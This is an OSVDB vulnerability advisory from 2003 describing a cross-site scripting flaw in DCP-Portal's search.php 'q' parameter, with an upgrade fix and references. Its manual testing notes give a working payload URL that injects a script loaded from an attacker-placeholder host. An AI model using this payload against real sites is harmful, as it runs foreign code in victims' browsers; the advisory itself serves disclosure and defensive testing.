DCP-Portal GET Method search.php q Variable XSS

2003-03-18T00:00:00
ID OSVDB:7021
Type osvdb
Reporter Ertan Kurt(ertank@olympos.org)
Modified 2003-03-18T00:00:00

Description

Vulnerability Description

DCP-Portal contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "q" variables upon submission to the "search.php" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Solution Description

Upgrade to version 6.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

DCP-Portal contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate "q" variables upon submission to the "search.php" script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Manual Testing Notes

http://[victim]/search.php?fields=content&q=<script%20src=http://[attacker]/code.js></script>

References:

Vendor URL: http://www.dcp-portal.org/ Secunia Advisory ID:8358 Related OSVDB ID: 7022 Nessus Plugin ID:11446 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-03/0275.html ISS X-Force ID: 11602 Bugtraq ID: 7141